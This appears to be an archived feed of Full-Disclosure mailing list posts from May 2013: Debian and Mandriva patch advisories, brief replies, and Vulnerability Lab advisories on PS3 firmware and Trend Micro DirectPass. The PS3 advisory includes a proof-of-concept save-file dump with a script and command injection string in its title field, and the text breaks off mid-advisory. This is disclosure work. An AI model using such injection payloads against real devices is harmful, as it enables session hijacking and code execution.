http://blog.gmane.org/gmane.comp.security.full-disclosure hourly 1 1901-01-01T00:00+00:00 http://gmane.org/img/gmane-25t.png http://gmane.org http://permalink.gmane.org/gmane.comp.security.full-disclosure/89380 <pre>-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2672-1 security&lt; at &gt;debian.org http://www.debian.org/security/ Florian Weimer May 22, 2013 http://www.debian.org/security/faq - ------------------------------------------------------------------------- Package : kfreebsd-9 Vulnerability : interpretation conflict Problem type : remote Debian-specific: no CVE ID : CVE-2013-3266 Debian Bug : 706414 Adam Nowacki discovered that the new FreeBSD NFS implementation processes a crafted READDIR request which instructs to operate a file system on a file node as if it were a directory node, leading to a kernel crash or potentially arbitrary code execution. The kfreebsd-8 kernel in the oldstable distribution (squeeze) does not enable the new NFS implementation. The Linux kernel is not affected by this vulnerability. For the stable distribution (wheezy), this problem has been fixed in version 9.0-10+deb70.1. For the testing distribution (jessie) and the unstable distribution (sid), this problem has been fixed in version 9.0-11. We recommend that you upgrade your kfreebsd-9 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-announce&lt; at &gt;lists.debian.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iQEcBAEBAgAGBQJRnSBsAAoJEL97/wQC1SS+AUIH/37RK8Rss3gXBRYRjv91NnkU TEPe22SEIPegeqNCP5XAP/zBC6aNy8O9KbcRE9P+D+nVQKj61lnX3NuF83dNUHVt ni1sc7SijlQ7TIFe9pMVAphRAC04qkkHGJmBzte10G2Wgl7o8o9o9bbKHGHZB+TK v4x0sZuhi3WObmOy5sOKSeeH40LnpSRAo5JrSEvAIWlzrn/KLoovTsFIltoMMS8l 0CSilidE638w+GwZQNzX2GDFrOmzi5w4BI0OoUCGybsPL/3M18/dspdrZ/4XTGuK UsRbZDKDbOk7Ww+Ld1Y/DSsTDlequsj6YaKEHy6shB0ehWzgVS3MbK6yfl6Z2Bk= =mqZx -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ </pre> Florian Weimer 2013-05-22T19:18:46 http://permalink.gmane.org/gmane.comp.security.full-disclosure/89379 <pre>-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2671-1 security&lt; at &gt;debian.org http://www.debian.org/security/ Salvatore Bonaccorso May 22, 2013 http://www.debian.org/security/faq - ------------------------------------------------------------------------- Package : request-tracker4 Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2012-4733 CVE-2013-3368 CVE-2013-3369 CVE-2013-3370 CVE-2013-3371 CVE-2013-3372 CVE-2013-3373 CVE-2013-3374 Multiple vulnerabilities have been discovered in Request Tracker, an extensible trouble-ticket tracking system. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2012-4733 A user with the ModifyTicket right can bypass the DeleteTicket right or any custom lifecycle transition rights and thus modify ticket data without authorization. CVE-2013-3368 The rt command line tool uses semi-predictable temporary files. A malicious user can use this flaw to overwrite files with permissions of the user running the rt command line tool. CVE-2013-3369 A malicious user who is allowed to see administration pages can run arbitrary mason components (without control of arguments), which may have negative side-effects. CVE-2013-3370 Request Tracker allows direct requests to private callback components, which could be used to exploit a Request Tracker extension or a local callback which uses the arguments passed to it insecurely. CVE-2013-3371 Request Tracker is vulnerable to cross-site scripting attacks via attachment filenames. CVE-2013-3372 Dominic Hargreaves discovered that Request Tracker is vulnerable to an HTTP header injection limited to the value of the Content-Disposition header. CVE-2013-3373 Request Tracker is vulnerable to a MIME header injection in outgoing email generated by Request Tracker. Request Tracker stock templates are resolved by this update. But any custom email templates should be updated to ensure that values interpolated into mail headers do not contain newlines. CVE-2013-3374 Request Tracker is vulnerable to limited session re-use when using the file-based session store, Apache::Session::File. However Request Tracker's default session configuration only uses Apache::Session::File when configured for Oracle databases. This version of Request Tracker includes a database content upgrade. If you are using a dbconfig-managed database, you will be offered the choice of applying this automatically. Otherwise see the explanation in /usr/share/doc/request-tracker4/NEWS.Debian.gz for the manual steps to perform. Please note that if you run request-tracker4 under the Apache web server, you must stop and start Apache manually. The "restart" mechanism is not recommended, especially when using mod_perl or any form of persistent perl process such as FastCGI or SpeedyCGI. For the stable distribution (wheezy), these problems have been fixed in version 4.0.7-5+deb7u2. For the testing distribution (jessie), these problems will be fixed soon. For the unstable distribution (sid), these problems have been fixed in version 4.0.12-2. We recommend that you upgrade your request-tracker4 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-announce&lt; at &gt;lists.debian.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) iQIcBAEBCgAGBQJRnR7CAAoJEHidbwV/2GP+PHEP/iuvd52P46sPb4ipZr36+KXo 5UqTQU2ierBK3u2RrsMNJQvcjaSZ+hFtzbm4pTPdQmtSf0zubSDrX0DlBuAu/kIH hBkRAzWWHENlKn2KDo6v6r9QB4vDFfG8W75WbGb7jXnSSOe/KiDNX0yMclJB8IxN 8T3+/CzIL6CFuIpSYouUo5OFNI7l0de0TE52fgPtKxZU7kFcGkXxJP/HJeISjUUB CF71oTSDQGEK/1XHXya20Ij10kbo4e3FM2uluS7GNzxf93pqygdT0bo8vWpOw5vU FU3yK3xP+E5sNgBbQ9L9PDsQpsVad4s25X5ZAAXNg9twmsOZv/DNAMbDFW6j2wcd GQH6bEqZ+08A8SkGf8THJLPdRTVM+ZqR1zXTUkyL5a1+C4Y/XH7V4Wffr4R0VyNj MPu1Y4fKtbSZE1CjKBu1nh38QaAKO8NT1qUi9VGv946Aa0En6ZhQcbhLPA+UwieU 9hrzP+GIZmc9xr6b++762BZE3jKC/L6c3+EbtaaZ2JHLMKrSvmPcu/hR8tFmYvp6 R39IuvHFW6Skxf1yB49fwiHG5Zs1qK/CcK+GHYW0Dx1cpYAveDw5CJ7ZNTeIGa2D 3n8QfIRlhY2UZj9qNbkmcTNRQ5n2UQwyoNyXBygDQQK8f/BovcwaifCvpdhw0cxT fII5MGU6lJxF1IWn1T4z =3Swv -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ </pre> Salvatore Bonaccorso 2013-05-22T19:45:55 http://permalink.gmane.org/gmane.comp.security.full-disclosure/89378 <pre>-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2670-1 security&lt; at &gt;debian.org http://www.debian.org/security/ Salvatore Bonaccorso May 22, 2013 http://www.debian.org/security/faq - ------------------------------------------------------------------------- Package : request-tracker3.8 Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2013-3368 CVE-2013-3369 CVE-2013-3370 CVE-2013-3371 CVE-2013-3372 CVE-2013-3373 CVE-2013-3374 Multiple vulnerabilities have been discovered in Request Tracker, an extensible trouble-ticket tracking system. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2013-3368 The rt command line tool uses semi-predictable temporary files. A malicious user can use this flaw to overwrite files with permissions of the user running the rt command line tool. CVE-2013-3369 A malicious user who is allowed to see administration pages can run arbitrary mason components (without control of arguments), which may have negative side-effects. CVE-2013-3370 Request Tracker allows direct requests to private callback components, which could be used to exploit a Request Tracker extension or a local callback which uses the arguments passed to it insecurely. CVE-2013-3371 Request Tracker is vulnerable to cross-site scripting attacks via attachment filenames. CVE-2013-3372 Dominic Hargreaves discovered that Request Tracker is vulnerable to an HTTP header injection limited to the value of the Content-Disposition header. CVE-2013-3373 Request Tracker is vulnerable to a MIME header injection in outgoing email generated by Request Tracker. Request Tracker stock templates are resolved by this update. But any custom email templates should be updated to ensure that values interpolated into mail headers do not contain newlines. CVE-2013-3374 Request Tracker is vulnerable to limited session re-use when using the file-based session store, Apache::Session::File. However Request Tracker's default session configuration only uses Apache::Session::File when configured for Oracle databases. This version of Request Tracker includes a database content upgrade. If you are using a dbconfig-managed database, you will be offered the choice of applying this automatically. Otherwise see the explanation in /usr/share/doc/request-tracker3.8/NEWS.Debian.gz for the manual steps to perform. Please note that if you run request-tracker3.8 under the Apache web server, you must stop and start Apache manually. The "restart" mechanism is not recommended, especially when using mod_perl or any form of persistent perl process such as FastCGI or SpeedyCGI. For the oldstable distribution (squeeze), these problems have been fixed in version 3.8.8-7+squeeze7. The stable, testing and unstable distributions do not contain anymore request-tracker3.8, which is replaced by request-tracker4. We recommend that you upgrade your request-tracker3.8 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-announce&lt; at &gt;lists.debian.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) iQIcBAEBCgAGBQJRnRTuAAoJEHidbwV/2GP+6WIQALZaGdX7EjLjcOOrJgHTyiJD vlZNbQmIG9oQdy1igmxoakUZXSBjhzcQnDuJreFBAvcZ0ZQF9REt1Q7W5dmTYUal 0p2EMCpbQpxtOcJxQ6mPvxRlF3fmrMEZIzJZId68JPYroCXO984xBZydvbNs0O/5 3ZZoUUERDgGWVw3xo3SHMcwWKsaFZntBP1Opt2uimswNnzSalmIhV5aJ0AfC3aU7 VygSP0Hdf/Psm8r7lplQk6GZJWP9VxVploJntM01vbeSNlxMLEiQJgOTvWuqGxs8 f/OWkJFFW3OB3CzL8ilGkIO2ySU/Gnln2Cu6bUIB1iyumvIX9SPuLqbW9163grEW XBg0qMF6xWUdX2weW88KQNCFl7JlMaCO0+81Zu2LUV5SRYfDGMSZnbaaHtjux97p NH8cJMnPBQ7AJlu6TS1YKhQ0/mWsW2OaXTQyCwxdfo9Kc6F6fxr79U8a/Win0wN/ eYfd4ToxntOVbjuLjMWUq7pp5smqP14eFZ0oPeW8pzGAyCz9dmFRTlllG5Q2DgEM 6S0pNDSFuHveiI/HW7mEafIH/TgaQXNEHQnh9i6DBkj8sye8xNq9ctlRd1sNZnbc huKLUXLc8fZDkvtgTIx8feY1irRTgUre+Jc4ZaicvXI12O/vjGqt8h4+TQ3nYrvA 48tkNm7U5QE4fvEQoT9F =nyOW -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ </pre> Salvatore Bonaccorso 2013-05-22T19:11:30 http://permalink.gmane.org/gmane.comp.security.full-disclosure/89377 <pre>Hi, didn't test the POC yet, but I guess the fun is here: Injecting system commands.. </pre> Milan Berger 2013-05-22T14:23:42 http://permalink.gmane.org/gmane.comp.security.full-disclosure/89376 <pre>Hey there guys, Do you know other projects, distributions, and installer kits for Raspberry PI aside from the distributions and kits mentioned in this article: http://resources.infosecinstitute.com/pentesting-distributions-and-installer-kits-for-your-raspberry-pi/ ? I am very much interested in trying out new projects :) Also lately I have been addicted to RetroPie ( https://github.com/petrockblog/RetroPie-Setup) ahahhaha although it is not related to security really but I just love emulating some cool and classic games from SNES. Regards, Jay Turla http://resources.infosecinstitute.com/author/jay-turla/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/</pre> Jay Turla 2013-05-21T16:13:53 http://permalink.gmane.org/gmane.comp.security.full-disclosure/89375 <pre>So, wanna tell me what exactly is critical about you being able to inject marquee tags into your savefile names? 2013/5/21 Vulnerability Lab &lt;research&lt; at &gt;vulnerability-lab.com&gt; _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/</pre> Julius Kivimäki 2013-05-21T15:29:34 http://permalink.gmane.org/gmane.comp.security.full-disclosure/89374 <pre>Hey Tavis, very interesting work! You're right: the list ist getting worse every year. So keep going!!! 2013/5/20 Tavis Ormandy &lt;taviso&lt; at &gt;cmpxchg8b.com&gt; _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/</pre> You Got Pwned 2013-05-21T18:09:27 http://permalink.gmane.org/gmane.comp.security.full-disclosure/89373 <pre>In the good spirit of full disclosure, we would appreciate some exploit code. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/</pre> Brian Blankenship 2013-05-22T03:00:40 http://permalink.gmane.org/gmane.comp.security.full-disclosure/89372 <pre>-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2013:166 http://www.mandriva.com/en/support/security/ _______________________________________________________________________ Package : krb5 Date : May 21, 2013 Affected: Business Server 1.0, Enterprise Server 5.0 _______________________________________________________________________ Problem Description: A vulnerability has been discovered and corrected in krb5: The kpasswd service provided by kadmind was vulnerable to a UDP ping-pong attack (CVE-2002-2443). The updated packages have been patched to correct this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2443 https://bugzilla.redhat.com/show_bug.cgi?id=962531 _______________________________________________________________________ Updated Packages: Mandriva Enterprise Server 5: 762c01ff4ce813cd3c5acce794c29aa3 mes5/i586/krb5-1.8.1-0.11mdvmes5.2.i586.rpm 415beef49e20f8b89c84b0270afbf1d6 mes5/i586/krb5-pkinit-openssl-1.8.1-0.11mdvmes5.2.i586.rpm a6bd6778ab49710b1a50633555b0dc27 mes5/i586/krb5-server-1.8.1-0.11mdvmes5.2.i586.rpm 497cfca620c25dd7ce523a61afdccc5e mes5/i586/krb5-server-ldap-1.8.1-0.11mdvmes5.2.i586.rpm 2fe4670b52795e8c74f53e7eee826c2c mes5/i586/krb5-workstation-1.8.1-0.11mdvmes5.2.i586.rpm 22926f634ea6ba5f816c14a2e30cc38a mes5/i586/libkrb53-1.8.1-0.11mdvmes5.2.i586.rpm 477f8f61cd9c8e577cd6797e850978ce mes5/i586/libkrb53-devel-1.8.1-0.11mdvmes5.2.i586.rpm 77c66246600b71f6471f75054e886cd4 mes5/SRPMS/krb5-1.8.1-0.11mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: 1cab52ff4c719378b97ec3acbc7d911f mes5/x86_64/krb5-1.8.1-0.11mdvmes5.2.x86_64.rpm b5d51d32e5eaa96ab973e5ce151a5254 mes5/x86_64/krb5-pkinit-openssl-1.8.1-0.11mdvmes5.2.x86_64.rpm 6218fc79250aaec5c7ca19b193fdb8dc mes5/x86_64/krb5-server-1.8.1-0.11mdvmes5.2.x86_64.rpm 88de99aa8cde8adaee672c265292a355 mes5/x86_64/krb5-server-ldap-1.8.1-0.11mdvmes5.2.x86_64.rpm 39791a90573b4de08efdaf0193bbc5dc mes5/x86_64/krb5-workstation-1.8.1-0.11mdvmes5.2.x86_64.rpm 846b75578bb5559cfcf7aa2ce9e43156 mes5/x86_64/lib64krb53-1.8.1-0.11mdvmes5.2.x86_64.rpm 7351a8d2be13df25ab9c2534489a2da0 mes5/x86_64/lib64krb53-devel-1.8.1-0.11mdvmes5.2.x86_64.rpm 77c66246600b71f6471f75054e886cd4 mes5/SRPMS/krb5-1.8.1-0.11mdvmes5.2.src.rpm Mandriva Business Server 1/X86_64: 3150d604a21be2373d223457da156734 mbs1/x86_64/krb5-1.9.2-3.3.mbs1.x86_64.rpm 52729f0759e686cfdf5f9c99efc28862 mbs1/x86_64/krb5-pkinit-openssl-1.9.2-3.3.mbs1.x86_64.rpm 4b997282ad6dd76eb7a10f07809bef71 mbs1/x86_64/krb5-server-1.9.2-3.3.mbs1.x86_64.rpm b10b3c0211e071ab93e818db684098f9 mbs1/x86_64/krb5-server-ldap-1.9.2-3.3.mbs1.x86_64.rpm 417d23306554b1d7d290e8d3fed1a2d8 mbs1/x86_64/krb5-workstation-1.9.2-3.3.mbs1.x86_64.rpm a17c8e2438c0415c9ea478bcc0715101 mbs1/x86_64/lib64krb53-1.9.2-3.3.mbs1.x86_64.rpm 2d05c4ac4b44be10ea1e3d4337689512 mbs1/x86_64/lib64krb53-devel-1.9.2-3.3.mbs1.x86_64.rpm 95305e2323d63546e970538b7d692447 mbs1/SRPMS/krb5-1.9.2-3.3.mbs1.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team &lt;security*mandriva.com&gt; -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFRm3ZlmqjQ0CJFipgRAmRWAJ42vFSB5f9jXtt3hRarBQpqxARd/ACfa9qv esFWMrXe/0P1/wv2ag87c6w= =Lg3K -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ </pre> security< at >mandriva.com 2013-05-21T16:34:00 http://permalink.gmane.org/gmane.comp.security.full-disclosure/89371 <pre>Interesting idea to create a thread and patch the list. Upon reading your first post, I immediately thought this wasn't going to be exploitable, you've proven me wrong. Any chance for a copy of the exploit code? I might port it to Metasploit. sd _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ </pre> sd 2013-05-21T03:14:32 http://permalink.gmane.org/gmane.comp.security.full-disclosure/89370 <pre>CVE-2013-3496. Local privilege escalation vulnerability in Infotecs products (ViPNet Client\Coordinator, SafeDisk, Personal Firewall) CVE reference: CVE-2013-3496 Credit: Maksim Chudakov (&lt; at &gt;MChudakov) Andrey Kurtasanov(andreykurtasanov&lt; at &gt;gmail.com) Severity: Medium Local\Remote: Local Vulnerability Class: Privilege Escalation Vendor URL: http://www.infotecs.biz/ Affected OS: Windows Vulnerable systems: ViPNet Client 3.2.10 (15632) and prior ViPNet Coordinator 3.2.10 (15632) and prior ViPNet SafeDisk 4.1 (0.5643) and prior VipNet Personal Firewall 3.1 and prior Possibly same issues in other Infotecs products and other versions Overview: A local privilege escalation vulnerability exists in the Infotecs products (ViPNet Client, SafeDisk, Personal Firewall and possibly other products), which could be exploited by an attacker to execute commands on the affected machine under the context of the SYSTEM user or user with local administrative privileges. Technical Background: The vulnerability exists because Infotecs products installs to folder with insecure permissions. "Everyone" group has "Full Control" rights to the files/folders in the following path: "%Program Files%\Infotecs\[product_name]". It means that any unprivileged user can modify, delete or change permissions of any file in data the folder consists of data, executable and configuration files. Solution: 1) Request a patch from Vendor or 2) Go to every executable and dll file within a ViPNet folder and change permissions manually Disclosure Timeline: 25/03/2013 Initial vendor notification 08/04/2013 Vendor response that patches has been released 20/05/2013 Advisory released _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ </pre> Максим Чудаков 2013-05-21T06:37:10 http://permalink.gmane.org/gmane.comp.security.full-disclosure/89369 <pre>Title: ====== Sony PS3 Firmware v4.31 - Code Execution Vulnerability Date: ===== 2013-05-12 References: =========== http://www.vulnerability-lab.com/get_content.php?id=767 VL-ID: ===== 767 Common Vulnerability Scoring System: ==================================== 6.5 Introduction: ============= The PlayStation 3 is the third home video game console produced by Sony Computer Entertainment and the successor to the PlayStation 2 as part of the PlayStation series. The PlayStation 3 competes with Microsoft`s Xbox 360 and Nintendo`s Wii as part of the seventh generation of video game consoles. It was first released on November 11, 2006, in Japan, with international markets following shortly thereafter. Major features of the console include its unified online gaming service, the PlayStation Network, its multimedia capabilities, connectivity with the PlayStation Portable, and its use of the Blu-ray Disc as its primary storage medium. (Copy of the Homepage: http://en.wikipedia.org/wiki/PlayStation_3 ) PlayStation Network, often abbreviated as PSN, is an online multiplayer gaming and digital media delivery service provided/run by Sony Computer Entertainment for use with the PlayStation 3, PlayStation Portable, and PlayStation Vita video game consoles. The PlayStation Network is the video game portion of the Sony Entertainment Network. (Copy of the Homepage: http://en.wikipedia.org/wiki/PlayStation_Network) Abstract: ========= The Vulnerability Laboratory Research Team discovered a code execution vulnerability in the official Playstation3 v4.31 Firmware. Report-Timeline: ================ 2012-10-26:Researcher Notification &amp; Coordination 2012-11-18:Vendor Notification 1 2012-12-14:Vendor Notification 2 2012-01-18:Vendor Notification 3 2012-**-**:Vendor Response/Feedback 2012-05-01:Vendor Fix/Patch by Check 2012-05-13:Public Disclosure Status: ======== Published Affected Products: ================== Sony Product: Playstation 3 4.31 Exploitation-Technique: ======================= Local Severity: ========= High Details: ======== A local code execution vulnerability is detected in the official Playstation3 v4.31 Firmware. The vulnerability allows local attackers to inject and execute code out of vulnerable ps3 menu main web context. There are 3 types of save games for the sony ps3. The report is only bound to the .sfo save games of the Playstation3. The ps3 save games sometimes use a PARAM.SFO file in the folder (USB or PS3 HD) to display movable text like marquees, in combination with a video, sound and the (path) background picture. Normally the ps3 firmware parse the redisplayed save game values &amp; detail information text when processing to load it via usb/ps3-hd. The import ps3 preview filtering can be bypassed via a splitted char by char injection of script code or system (ps3 firmware) specific commands. The attacker syncronize his computer (to change the usb context) with USB (Save Game) and connects to the network (USB, COMPUTER, PS3), updates the save game via computer and can execute the context directly out of the ps3 savegame preview listing menu (SUB/HD). The exploitation requires local system access, a manipulated .sfo file, an usb device. The attacker can only use the given byte size of the saved string (attribute values) to inject his own commands or script code. The ps3 filter system of the SpeicherDaten (DienstProgramm) module does not recognize special chars and does not provide any kind of input restrictions. Attackers can manipulate the .sfo file of a save game to execute system specific commands or inject malicious persistent script code. Successful exploitation of the vulnerability can result in persistent but local system command executions, psn session hijacking, persistent phishing attacks, external redirect out of the vulnerable module, stable persistent save game preview listing context manipulation. Vulnerable Section(s): [+] PS Menu &gt; Game (Spiel) Vulnerable Module(s): [+] SpeicherDaten (DienstProgramm) PS3 &gt; USB Gerät Affected Section(s): [+] Title - Save Game Preview Resource (Detail Listing) Proof of Concept: ================= The firmware preview listing validation vulnerability can be exploited by local attackers and with low or medium required user interaction. For demonstration or reproduce ... The attacker needs to sync his computer (to change the usb context) with USB (Save Game) and connects to the network (USB, COMPUTER, +PS3), updates the save game via computer and can execute the context directly out of the ps3 savegame preview listing menu (SUB/HD). The exploitation requires local system access, a manipulated .sfo file, an usb device. The attacker can only use the given byte size of the saved string (attribute values) to inject his own commands or script code. The ps3 filter system of the SpeicherDaten (DienstProgramm) module does not recognize special chars and does not provide any kind of input restrictions. Attackers can manipulate the .sfo file of a save game to execute system specific commands or inject malicious persistent script code out of the save game preview listing. If you inject standard frames or system unknow commands (jailbreak) without passing the filter char by char and direct sync as update you will fail to reproduce! PoC: PARAM.SFO PSF Ä &lt; at &gt; h % , 4 $ C &lt; at &gt; ( V h j € p t € ð ACCOUNT_ID ATTRIBUTE CATEGORY DETAIL PARAMS PARAMS2 PARENTAL_LEVEL SAVEDATA_DIRECTORY SAVEDATA_LIST_PARAM SUB_TITLE TITLE 40ac78551a88fdc SD PSHACK: Benjamin Ninja H%20'&gt;"&lt;[PERSISTENT INJECTED SYSTEM COMMAND OR CODE!] Hackizeit: 1:33:07 ExpSkills: VL-LAB-TRAINING Operation: 1% Trojaners: 0% ... Õõ~\˜òíA×éú;óç 40ac78551a88fdc ... BLES00371-NARUTO_STORM-0 HACKINGBKM 1 PSHACK: Benjamin Ninja H%20'&gt;"&lt;[PERSISTENT INJECTED SYSTEM COMMAND OR CODE!]; Solution: ========= Restrict the savegame name input and disallow special chars. Encode the savegame values and redisplaying in the menu preview of the game. Parse the strings and values from the savegames even if included string by string via sync. Risk: ===== The security risk of the high exploitable but local vulnerability is estimated as critical and needs to be fixed soon. Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm&lt; at &gt;vulnerability-lab.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin&lt; at &gt;vulnerability-lab.com - support&lt; at &gt;vulnerability-lab.com - research&lt; at &gt;vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php- vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team &amp; the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin&lt; at &gt;vulnerability-lab.com or support&lt; at &gt;vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory </pre> Vulnerability Lab 2013-05-20T23:32:57 http://permalink.gmane.org/gmane.comp.security.full-disclosure/89368 <pre>Title: ====== Trend Micro DirectPass 1.5.0.1060 (Cloud) Software - Multiple Software Vulnerabilities Date: ===== 2013-05-21 References: =========== http://www.vulnerability-lab.com/get_content.php?id=894 Article: http://www.vulnerability-lab.com/dev/?p=580 Trend Micro (Reference): http://esupport.trendmicro.com/solution/en-US/1096805.aspx Trend Micro Solution ID: 1096805 Video: http://www.vulnerability-lab.com/get_content.php?id=951 VL-ID: ===== 894 Common Vulnerability Scoring System: ==================================== 6.1 Introduction: ============= Trend Micro™ DirectPass™ manages website passwords and login IDs in one secure location, so you only need to remember one password. Other features include: Keystroke encryption, secure password generation, automatic form-filling, confidential notes, and a secure browser. Convenience - You can securely and easily manage passwords for numerous online accounts with just one password and automatically login to your websites with one click. More Security - You get an extra layer of online security with a specially designed browser for online banking and financial websites and protection from keylogging malware. No Hassles – You don’t have to be technical wizard to benefit from this password service, it’s simple to use. Confidence – You can have peace-of-mind using a password service provided by an Internet security provider with 20+ years of experience. All Your Devices – You can use DirectPass password manager on Windows PCs, Android mobile, Android Tablet, iPads and iPhones, and all devices are automatically encrypted and synchronized using the cloud (Copy of the Vendor Homepage: http://www.trendmicro.com/us/home/products/directpass/index.html ) Abstract: ========= The Vulnerability Laboratory Research Team discovered multiple software vulnerabilities in the official Trend Micro DirectPass v1.5.0.1060 Software. Report-Timeline: ================ 2013-03-08:Researcher Notification &amp; Coordination (Benjamin Kunz Mejri) 2013-03-09:Vendor Notification (Trend Micro - Security Team) 2013-03-16:Vendor Response/Feedback (Trend Micro - Karen M.) 2013-05-09:Vendor Fix/Patch (Trend Micro - Active Update Server) 2013-05-15:Vendor Fix/Patch (Trend Micro - Solution ID &amp; Announcement) 2013-05-21:Public Disclosure (Vulnerability Laboratory) Status: ======== Published Affected Products: ================== Trend Micro Product: DirectPass 1.5.0.1060 Exploitation-Technique: ======================= Local Severity: ========= High Details: ======== 1.1 A local command injection vulnerability is detected in the official Trend Micro DirectPass v1.5.0.1060 Software. The vulnerability allows local low privileged system user accounts to inject system specific commands or local path requests to compromise the software. The vulnerability is located in the direct-pass master password setup module of the Trend Micro InstallWorkspace.exe file. The master password module of the software allows users to review the included password in the secound step for security reason. The hidden protected master password will only be visible in the check module when the customer is processing to mouse-over onto the censored password field. When the software is processing to display the hidden password in plain the command/path injection will be executed out of the not parsed master password context in in the field listing. Exploitation of the vulnerability requires a low privilege system user account with direct-pass access and low or medium user interaction. Successful exploitation of the vulnerability results in software and system process compromise or execution of local system specific commands/path. Vulnerable File(s): [+] InstallWorkspace.exe Vulnerable Module(s): [+] Setup Master Password Vulnerable Parameter(s): [+] Master Password Affected Module(s): [+] Check Listing (Master Password) 1.2 A persistent input validation vulnerability is detected in the official Trend Micro DirectPass v1.5.0.1060 Software. The bug allows local attackers with low privileged system user account to implement/inject malicious script code on application side (persistent) of the software. The persistent web vulnerability is located in the direct-pass check module when processing to list a manipulated master password. In step one injects a malicious iframe in the hidden fields as master password. The inserted context will be saved and the execution will be in the next step when processing to list the master password context in the last check module. To bypass the validation the and execute the injected script code the attacker needs to split (%20) the input request. Exploitation of the vulnerability requires medium user interaction and a low privilege system user account with direct-pass. Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), persistent phishing, persistent external redirects to malware or scam and persistent web context manipulation of the affected vulnerable module. Vulnerable File(s): [+] InstallWorkspace.exe Vulnerable Module(s): [+] Setup Master Password Vulnerable Parameter(s): [+] Master Password Affected Module(s): [+] Check Listing (Master Password) 1.3 A critical pointer vulnerability (DoS) is detected in the official Trend Micro DirectPass v1.5.0.1060 Software. The bug allows local attackers with low privileged system user account to crash the software via pointer vulnerability. The pointer vulnerability is also located in the direct-pass master password listing section. Attackers can inject scripts with loops to mouse-over multiple times the hidden password check listing of the master password. The result is a stable cash down of the 